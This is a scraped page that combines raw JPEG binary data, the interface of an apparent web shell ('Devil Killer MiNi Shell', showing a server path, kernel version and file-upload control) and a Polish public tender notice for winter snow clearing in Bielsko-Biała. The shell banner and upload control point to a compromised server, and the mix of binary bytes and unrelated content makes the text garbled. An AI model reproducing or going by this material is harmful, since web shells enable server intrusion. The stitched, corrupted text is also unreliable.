JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221017/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221017/0039550701-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usług zimowego utrzymania ulic, parkingów, dojazdów do budynków i altan śmietnikowych w sezonie zimowym 2022/2023 na terenach stanowiących zasób Gminy Bielsko-Biała zarządzanych przez ZGM </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miasto Bielsko-Biała - Zakład Gospodarki Mieszkaniowej</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 070019077</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Lipnicka 26</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Bielsko-Biała</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">43-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL225 - Bielski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@zgm.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zgm.eu</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samorządowy zakład budżetowy</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Budownictwo i obiekty komunalne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usług zimowego utrzymania ulic, parkingów, dojazdów do budynków i altan śmietnikowych w sezonie zimowym 2022/2023 na terenach stanowiących zasób Gminy Bielsko-Biała zarządzanych przez ZGM </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-1e60643a-4e05-11ed-9171-f6b7c7d59353</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00395507</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-10-17</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00028920/09/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.9 Świadczenie usług zimowego utrzymania dróg, schodów oraz dojść i dojazdów do śmietników i parkingów na nieruchomościach zarządzanych przez Zakład Gospodarki Mieszkaniowej</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/Postepowania/ad2b92f1-90e6-4433-9957-9e1b5a6e16da <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1)przy użyciu miniPortalu, dostępnego pod adresem:<br/>ttps://miniportal.uzp.gov.pl/; 2) ePUAPu, dostępnego pod adresem https://epuap.gov.pl/wps/portal ,3) poczty elektronicznej pod<br/>adresem przetargi@zgm.eu</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział<br/>w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP<br/>ma dostęp do następujących formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz do „Formularza do<br/>komunikacji”. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii<br/>dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu<br/>miniPortal oraz Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP). 3) Dokumenty<br/>elektroniczne, składane są przez wykonawcę za pośrednictwem „Formularza do komunikacji” jako załączniki. Zamawiający<br/>dopuszcza i rekomenduje składanie dokumentów elektronicznych za pomocą poczty elektronicznej, na wskazany w pkt 3 adres<br/>poczty elektronicznej. Sposób sporządzenia dokumentów elektronicznych musi być zgody z wymaganiami określonymi w<br/>rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz<br/>wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie (Dz. U. z 2020 poz. 2452) oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia<br/>23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać<br/>zamawiający od wykonawcy (Dz.U. z 2020 poz. 2415).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający zrealizował obowiązek informacyjny w SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zamawiający zrealizował obowiązek informacyjny w SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZGM/DZ-JK/175/2022/LE</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia, jest wykonywanie usług w zakresie zimowego utrzymania ulic, parkingów, dojazdów do budynków i altan śmietnikowych w sezonie zimowym 2022/2023 na terenach stanowiących zasób Gminy Bielsko-Biała zarządzanych przez Zakład Gospodarki Mieszkaniowej, w podziale na 2 części. Tereny nieruchomości objętych zamówieniem zlokalizowane są w granicach administracyjnych miasta Bielsko – Biała<br/>2. Część 1 zamówienia obejmuje nieruchomości o łącznej powierzchni 11 303,00 m2 zlokalizowane w REJONIE I:<br/>a)	przedmiot zamówienia dla części 1 zamówienia został szczegółowo określony w „Opisie przedmiotu zamówienia” stanowiącym załącznik nr 3 do SWZ,<br/>b)	szczegółowa lokalizacja nieruchomości dla części 1 zamówienia, została określona w załączniku nr 4 do SWZ – „Wykaz nieruchomości dla części 1 zamówienia – Rejon I” </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90630000-2 - Usługi usuwania oblodzeń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-04-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona wyboru najkorzystniejszej oferty na podstawie poniższych kryteriów:<br/><br/>1)	Cena oferty brutto („KC”) 1)	–	waga 90 %<br/>2)	Kara umowna za zwłokę w rozpoczęciu realizacji usług objętych zamówieniem („KKu”) 3)	–	waga 10 %<br/><br/>1)	do oceny ofert Zamawiający przyjmie cenę brutto oferty. <br/>2)	Kara umowna za zwłokę w rozpoczęciu realizacji usług objętych zamówieniem – kwota wybrana przez Wykonawcę, z tym, że nie niższa niż 50,00 zł oraz nie wyższa niż 150,00 zł. <br/>Oferty z kwotą kary umownej niższą niż 50,00 zł będą odrzucone na podstawie art. 226 ust. 1 pkt 5 ustawy, jako niezgodne z warunkami zamówienia.<br/>W przypadku ofert z kwotą kary umownej wyższą niż 150,00 zł, Zamawiający przyjmie do oceny karę umowną 150,00 zł.<br/><br/>§ 2. Sposób obliczenia punktów.<br/>1.	Kryterium ceny brutto KC będzie wyliczane wg wzoru:<br/>1)	ofercie najtańszej przyznaje się maksymalną liczbę punktów – 100, i wylicza się kryterium KC wg wzoru:<br/>KCon =	100 x waga (90%) x liczba członków komisji (3)<br/>2)	każdej następnej ofercie przyznaje się liczbę punktów proporcjonalnie niższą, wyliczoną wg wzoru:<br/><br/>KCoo =	Con x 100	x waga (90%) x liczba członków komisji (3)<br/>	Coo	<br/><br/>gdzie:<br/>Con - cena oferty najtańszej <br/>Coo - cena oferty ocenianej <br/><br/><br/>2.	Kryterium kary umownej KKu będzie wyliczane wg wzoru:<br/>1)	ofercie z najwyższą kwotą kary umownej przyznaje się maksymalną liczbę punktów – 100, i wylicza się kryterium KKu1 wg wzoru:<br/><br/>KKun =	100 x waga (10 %) x liczba członków komisji (3)<br/><br/>2)	każdej następnej ofercie przyznaje się liczbę punktów proporcjonalnie niższą, wyliczoną wg wzoru:<br/><br/>KKuoo =	Kuoo x 100	x waga (10 %) x liczba członków komisji (3)<br/>	Kuon	<br/>	<br/>gdzie:<br/>Kuoo – kwota kary umownej w ofercie ocenianej<br/>Kuon – najwyższa zaoferowana kwota kary umownej.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kara umowna za zwłokę w rozpoczęciu realizacji usług objętych zamówieniem</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia, jest wykonywanie usług w zakresie zimowego utrzymania ulic, parkingów, dojazdów do budynków i altan śmietnikowych w sezonie zimowym 2022/2023 na terenach stanowiących zasób Gminy Bielsko-Biała zarządzanych przez Zakład Gospodarki Mieszkaniowej, w podziale na 2 części. Tereny nieruchomości objętych zamówieniem zlokalizowane są w granicach administracyjnych miasta Bielsko – Biała.<br/>2. Część 2 zamówienia obejmuje nieruchomości o łącznej powierzchni 14 047,00 m2 zlokalizowane w REJONIE II:<br/>a)	przedmiot zamówienia dla części 2 zamówienia został szczegółowo określony w „Opisie przedmiotu zamówienia” stanowiącym załącznik nr 3 do SWZ,<br/>b)	szczegółowa lokalizacja nieruchomości dla części 2 zamówienia, została określona w załączniku nr 5 do SWZ – „Wykaz nieruchomości dla części 2 zamówienia – Rejon II”. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90630000-2 - Usługi usuwania oblodzeń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-04-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona wyboru najkorzystniejszej oferty na podstawie poniższych kryteriów:<br/><br/>1)	Cena oferty brutto („KC”) 1)	–	waga 90 %<br/>2)	Kara umowna za zwłokę w rozpoczęciu realizacji usług objętych zamówieniem („KKu”) 3)	–	waga 10 %<br/><br/>1)	do oceny ofert Zamawiający przyjmie cenę brutto oferty. <br/>2)	Kara umowna za zwłokę w rozpoczęciu realizacji usług objętych zamówieniem – kwota wybrana przez Wykonawcę, z tym, że nie niższa niż 50,00 zł oraz nie wyższa niż 150,00 zł. <br/>Oferty z kwotą kary umownej niższą niż 50,00 zł będą odrzucone na podstawie art. 226 ust. 1 pkt 5 ustawy, jako niezgodne z warunkami zamówienia.<br/>W przypadku ofert z kwotą kary umownej wyższą niż 150,00 zł, Zamawiający przyjmie do oceny karę umowną 150,00 zł.<br/><br/>§ 2. Sposób obliczenia punktów.<br/>1.	Kryterium ceny brutto KC będzie wyliczane wg wzoru:<br/>1)	ofercie najtańszej przyznaje się maksymalną liczbę punktów – 100, i wylicza się kryterium KC wg wzoru:<br/>KCon =	100 x waga (90%) x liczba członków komisji (3)<br/>2)	każdej następnej ofercie przyznaje się liczbę punktów proporcjonalnie niższą, wyliczoną wg wzoru:<br/><br/>KCoo =	Con x 100	x waga (90%) x liczba członków komisji (3)<br/>	Coo	<br/><br/>gdzie:<br/>Con - cena oferty najtańszej <br/>Coo - cena oferty ocenianej <br/><br/><br/>2.	Kryterium kary umownej KKu będzie wyliczane wg wzoru:<br/>1)	ofercie z najwyższą kwotą kary umownej przyznaje się maksymalną liczbę punktów – 100, i wylicza się kryterium KKu1 wg wzoru:<br/><br/>KKun =	100 x waga (10 %) x liczba członków komisji (3)<br/><br/>2)	każdej następnej ofercie przyznaje się liczbę punktów proporcjonalnie niższą, wyliczoną wg wzoru:<br/><br/>KKuoo =	Kuoo x 100	x waga (10 %) x liczba członków komisji (3)<br/>	Kuon	<br/>	<br/>gdzie:<br/>Kuoo – kwota kary umownej w ofercie ocenianej<br/>Kuon – najwyższa zaoferowana kwota kary umownej.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kara umowna za zwłokę w rozpoczęciu realizacji usług objętych zamówieniem</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	W odniesieniu do warunków udziału w postępowaniu dotyczących zdolności technicznej lub zawodowej (art. 112 ust. 2 pkt 4 ustawy) Zamawiający wymaga, aby Wykonawca spełniał minimalne warunki umożliwiające realizację zamówienia na odpowiednim poziomie jakości, poprzez: <br/>1)	wykazanie, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie, wykonał lub – w przypadku świadczeń powtarzających się lub ciągłych – również wykonuje należycie co najmniej 1 usługę w zakresie świadczenia usług zimowego utrzymania dróg, ulic, parkingów, placów itp. (w tym co najmniej usługi odśnieżania i posypywania) odpowiadającą swoim rodzajem usługom stanowiącym przedmiot niniejszego zamówienia – o wartości nie mniejszej niż 70 000,00 zł brutto wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie. Przez jedną usługę należy rozumieć usługę świadczoną w sposób ciągły w ramach jednej umowy u danego zamawiającego, przez okres nie krótszy niż 6 miesięcy. W przypadku świadczeń powtarzających się lub ciągłych warunek będzie spełniony, jeżeli usługa będzie świadczona przez co najmniej 6 miesięcy przed upływem terminu składania ofert. Warunek powinien zostać spełniony odrębnie dla każdej części zamówienia, tj. Wykonawca ubiegający się o udzielenie zamówienia w obu częściach zamówienia, powinien wykazać realizację 2 usług zrealizowanych na warunkach określonych powyżej;<br/>2)	wykazanie, że dysponuje osobami, które będą uczestniczyć w wykonaniu zamówienia, w szczególności co najmniej:<br/>a)	1 osobą (pracownikiem) odpowiedzialną za nadzorowanie i koordynowanie realizacji przedmiotu usługi;<br/>b)	2 osobami (pracownikami) uprawnionymi do prowadzenia pojazdów mechanicznych przystosowanym do pracy z pługiem, wykorzystywanych podczas realizacji przedmiotu zamówienia<br/>c)	2 osobami (pracownikami) uprawnionymi do prowadzenia samochodów ciężarowych o masie do 3,5 t<br/>Wymóg określony w lit. b i c powinien być spełniony odrębnie dla każdej części zamówienia.<br/>3)	dysponuje sprzętem niezbędnym do wykonania zamówienia w postaci: pojazdów samochodowych lub ciągników, posiadających aktualne badania techniczne, obowiązkowe ubezpieczenie przez cały okres trwania umowy oraz dopuszczonych do ruchu drogowego w ilości:<br/>a)	co najmniej 2 pojazdy przystosowane do pracy z pługiem i posypywarką, w tym:<br/>	jeden pojazd lekki wyposażony w pług o szerokości max 2 m i posypywarkę, dostosowany do przejazdu przez wąskie ulice, dojazdy i parkingi <br/>	jeden ciągnik rolniczy (traktor) lub inny pojazd specjalistyczny ciężki wyposażony w pług i posypywarkę<br/>b)	co najmniej jeden samochód dostawczy o masie do 3,5 t dostosowany do przewożenia piasku lub soli drogowej<br/>Dla pojazdów/sprzętu/wyposażenia technicznego nie stanowiącego własności Wykonawcy należy dodatkowo załączyć oświadczenie właściciela o udostępnieniu jednostek sprzętowych dla celów realizacji zamówienia na zasadach określonych w § 3 niniejszego rozdziału. <br/>Jeżeli jednak Wykonawca dysponuje pojazdami/sprzętem/wyposażeniem technicznym na zasadach najmu, dzierżawy lub leasingu i posiada uprawnienie do władania rzeczą, korzystania z niej w sposób zgodny z jej przeznaczeniem, używania jej – uznaje się, że dysponuje nią w rozumieniu właściciela i nie będzie to wówczas dysponowanie zasobami podmiotu trzeciego.<br/>Wymóg określony w pkt 3 powinien być spełniony odrębnie dla każdej części zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie wymaga złożenia podmiotowych środków dowodowych na potwierdzenie braku podstaw do wykluczenia</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">2.	W celu potwierdzenia okoliczności, o których mowa w art. 112 ust. 2 pkt 4 ustawy w zakresie zdolności technicznej lub zawodowej, określonych w Rozdziale V § 2 ust. 1, Wykonawca przedłoży:<br/>1)	wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, sporządzony na formularzu stanowiącym załącznik nr 11 do Specyfikacji,<br/>2)	dowody poświadczające, że usługi wskazane przez Wykonawcę w wykazie o którym mowa w pkt 1 zostały wykonane należycie. Zgodnie z postanowieniami § 9 ust. 1 pkt 2 Rozporządzenia Ministra 